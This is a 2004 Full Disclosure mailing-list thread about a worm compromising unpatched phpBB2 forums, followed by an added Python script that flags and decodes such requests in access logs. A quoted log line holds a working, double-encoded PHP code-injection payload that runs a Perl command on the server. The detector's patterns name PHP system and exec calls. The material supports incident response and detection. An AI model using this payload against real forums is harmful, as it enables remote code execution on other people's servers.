Full Disclosure mailing list archives
RE: Worm hitting PHPbb2 Forums
From: "Mike" <mike_sha () shaw ca>
Date: Tue, 21 Dec 2004 13:28:27 -0500
Does this affect PHPBB2 in general, or is it platform specific as well?

Mike Fetherston

-----Original Message-----
From: mark () onnow net [mailto:mark () onnow net]
Sent: Tuesday, December 21, 2004 12:47 PM
To: L. Walker
Cc: incidents () securityfocus com; full-disclosure () lists netsys com
Subject: Re: Worm hitting PHPbb2 Forums

From what I have read, this can happen in any phpbb version lower than 2.0.11

This exploit is becoming frequent. Normally uploading a ddos bot.

Mark

Quoting "L. Walker" <lwalker () magi net au>:

Just spotted two clients hit by this. One client didn't update his software (PHP 4.3.4, Apache 1.3.22) and was rootkitted by generation 16. Chkrootkit says it's Adore, however could be something else. Datacenter wasn't very smart and has since wiped the server, so no binaries or other evidence.

Generation 12 only wiped out PHP files, replacing them with its own message on other client's PHPbb2 forum.

Access logs show:

66.220.28.92 - - [21/Dec/2004:18:07:17 +1100] "GET
/forum/viewtopic.php?p=1445&sid=d2260869a73fb5aca2aed0d8a88cf55a&highlig ht
=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252ech r(
32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252ech r(
112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252ec hr
(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252ec hr
(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252 ec
hr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252 ec
hr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)% 25
2echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)% 25
2echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106 )%
252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78 )%
252echr(41)%252echr(34))%252e%2527HTTP/1.0" 200 270
"http://www.noobforces.net/forum/viewtopic.php?p=1445&sid=d2260869a73fb5 ac
a2aed0d8a88cf55a&highlight=%2527%252Esystem(chr(112)%252echr(101)%252ech r(
114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252ec hr
(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252 ec
hr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252e ch
r(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252 ec
hr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%25 2e
chr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110) %2
52echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89) %2
52echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(12 2)
%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(9 7)
%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

--
L. Walker <lwalker at magi dot net dot au>
Network Administrator / Consultant

------------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
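
For triaging access logs like the one quoted above, the following is an added example (not part of the original thread) that flags requests whose highlight parameter is still percent-encoded after the server's own decoding (%2527 is an encoded %27) and resolves any chr() chain for the analyst. The sample lines are constructed, the first shortened from the request in the post; the function names, field names and list of flagged PHP calls are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines. The first is shortened from the request quoted in
# the post; the second is an ordinary search-highlight hit for comparison.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Dec/2004:18:07:17 +1100] "GET /forum/viewtopic.php?p=1445'
    '&highlight=%2527%252Esystem(chr(112)%252echr(101))%252e%2527 HTTP/1.0" 200 270',
    '192.0.2.11 - - [21/Dec/2004:18:09:02 +1100] "GET /forum/viewtopic.php?p=1445'
    '&highlight=rootkit%20adore HTTP/1.0" 200 9120',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+)')
CHR_RE = re.compile(r"chr\((\d{1,3})\)", re.I)
# Quote characters or PHP call syntax have no place in a search-highlight term.
SUSPICIOUS_RE = re.compile(r"['\"`]|\b(?:system|exec|passthru|eval|chr)\s*\(", re.I)

def decode_fully(value, max_rounds=4):
    """Percent-decode until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_line(line):
    """Return a finding dict for a multiply-encoded highlight value, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    # parse_qs performs the first decoding round, as the web server would.
    for value in parse_qs(query, keep_blank_values=True).get("highlight", []):
        text, extra_rounds = decode_fully(value)
        if extra_rounds >= 1 and SUSPICIOUS_RE.search(text):
            return {
                "client": line.split(" ", 1)[0],
                "extra_rounds": extra_rounds,  # decodes needed beyond the server's
                "decoded": text,
                # Characters spelled out by chr(N) calls, for the analyst's notes.
                "chr_text": "".join(chr(int(n)) for n in CHR_RE.findall(text)),
            }
    return None

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(inspect_line(entry))
```

Requiring both the extra decoding round and the code-like content keeps ordinary searches that contain an apostrophe from being flagged.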